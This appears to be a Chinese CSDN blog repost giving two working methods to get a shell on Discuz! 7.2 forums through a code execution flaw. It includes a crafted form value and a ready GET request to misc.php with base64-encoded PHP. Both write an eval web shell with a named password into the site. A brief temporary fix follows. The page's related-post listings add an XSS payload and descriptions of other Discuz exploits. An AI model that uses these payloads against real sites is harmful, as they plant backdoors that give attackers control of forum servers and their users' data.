7.2 discuz 拿shell_discuz 7.2代码执行漏洞利用方法两则

最新推荐文章于 2021-12-21 14:33:43 发布
最新推荐文章于 2021-12-21 14:33:43 发布
阅读量637 收藏
点赞数
文章标签: 7.2 discuz 拿shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39612038/article/details/111846294
版权

使用该exp的话仅限本机测试,其他用途后果自负!

第一种方法:

先注册个用户然后把

帖子ID,指定一个存在的帖子即可:

chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

里面有个提交地址改下,保存html

打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd

第二种方法:

直接GET,利用语句:

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法:

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁:

http://www.discuz.net/thread-1537673-1-1.html

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://www.yesck.com/post/442/

weixin_39612038
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
7.2 discuzshell_discuz 7.2 SQL 注入漏洞分析
weixin_39852647的博客
12-22 425
1、漏洞影响范围该漏洞影响discuz 7.2discuz 7.2可以从http://www.comsenz.com/downloads/install/discuz下载2、漏洞成因分析漏洞存在于discuz根目录的faq.php文件,当程序使用$_GET,$_POST, $_COOKIES传入参数,faq.php,包含的./include/common.inc.php文件中会对这几个对象做处理...
Discuz! 7.2的一个XSS漏洞
软件质量优化
01-26 3510
<br /> <br />Discuz! 7.2的一个XSS漏洞<br /> <br />http://bbs.example.com/vote/showtome.php?tid=6>"><script>alert(3580839)</script><br /> <br />在投票模块中出现的<br /> <br />有空要下载7.2的源码研究研究<br /> <br /> <br /> 
Discuz7.2漏洞
whrjxyygx的专栏
01-13 5039
发布日期:2010-01-06更新日期:2010-01-07受影响系统:Discuz! Discuz! 7.1Discuz! Discuz! 7.2描述:Discuz!是一款华人地区非常流行的Web论坛程序。Discuz!的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。以下是有漏洞代码段:function showmessage
Discuz! 7.1 & 7.2 远程代码执行漏洞
weixin_34198453的博客
10-31 334
受影响产品: Discuz! 7.1 &amp; 7.2 漏洞描述: 产生漏洞的$scriptlang数组在安装插件后已经初始化 Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。 下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的: 一、漏洞来...
Discuz!7.0-7.2后台settings.inc.php中写shell漏洞
caiguazheng4921的博客
04-19 194
发布时间:2010-02-05 影响版本: Discuz!7.0-7.2漏洞描述: 漏洞详情: if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) { $ucdbpassnew = $settingsnew['uc']['dbpass'...
Discuz_7.2_FULL_SC_GBK
05-15
Discuz_7.2_FULL_SC_GBK
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
Discuz_7.2_FULL_SC_GBK.zip
12-06
Discuz! 论坛软件的环境需求 +----------------------------------+ 1. 可用的 www 服务器,如 Apache、Zeus、IIS 等 2. php 4.3.0 及以上 3. Zend Optimizer 2.5.7 及以上 4. MySQL 3.23 及以上,仅针对 MySQL ...
Discuz_7.2论坛安装源代码
10-23
Discuz_7.2_FULL_SC_UTF8.zip Discuz_7.2_FULL_SC_UTF8.zip Discuz_7.2_FULL_SC_UTF8.zip Discuz_7.2_FULL_SC_UTF8.zip
PDDPrintClient_V1.6.7.2_Build20221025164427_Final.exe
11-30
PDDPrintClient_V1.6.7.2_Build20221025164427_Final.exe
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
Discuz7.1&7.2 Oday 入侵手记一则(拿服务器)
01-07
Discuz7.1&7.2 Oday 入侵手记一则(拿服务器)
Python写的Discuz7.2版faq.php注入漏洞工具
12-25
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- coding: utf_8 -*- # author iswin import sys import hashlib import time import math import base64 import urllib2 import urllib import r
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1087
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
Discuz 7.2漏洞入侵图解
kuxing100的专栏
05-06 4379
Discuz 7.2漏洞入侵图解 找到一个论坛,注册一个账号 注册好后,使用exp 复制以下代码: http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11
discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP
weixin_36081891的博客
04-07 454
具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:http://www.freebuf.com/vuls/37643.html看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-04813...
discuz7.2漏洞分析
qq_38415434的博客
08-07 864
一 参数的入口 这段话的意思时遍历三种提交的方法,获取参数传递的值。 有一个函数是daddslashes,跟进看一下。 这段代码的意思是对数据里的每一个字符都进行转义处理 二 漏洞产生的代码在faq.php195行 跟进implodeid函数,在faq.php的675行 这个函数的功能将数组里的值拆分出来,如图 到了这里我们知道,如果数组值当中存在在 / 或者 ’ ,那么在拼接s...
discuz php7.1,Discuz! 7.1 & 7.2 远程代码执行漏洞
weixin_29192365的博客
04-12 714
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。漏洞介绍:Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。漏洞分析:下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:一、漏洞来自showmessage函数:functions...
php discuzSQL注入_Discuz 7.2 /search.php SQL注入漏洞
最新发布
05-24
其中,Discuz 7.2 版本中的 /search.php 存在 SQL 注入漏洞,攻击者可以利用该漏洞直接执行恶意 SQL 代码,以此获取数据库中的敏感信息。 攻击者可以通过构造恶意的搜索关键字,使网站后台执行恶意 SQL 代码。具体...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值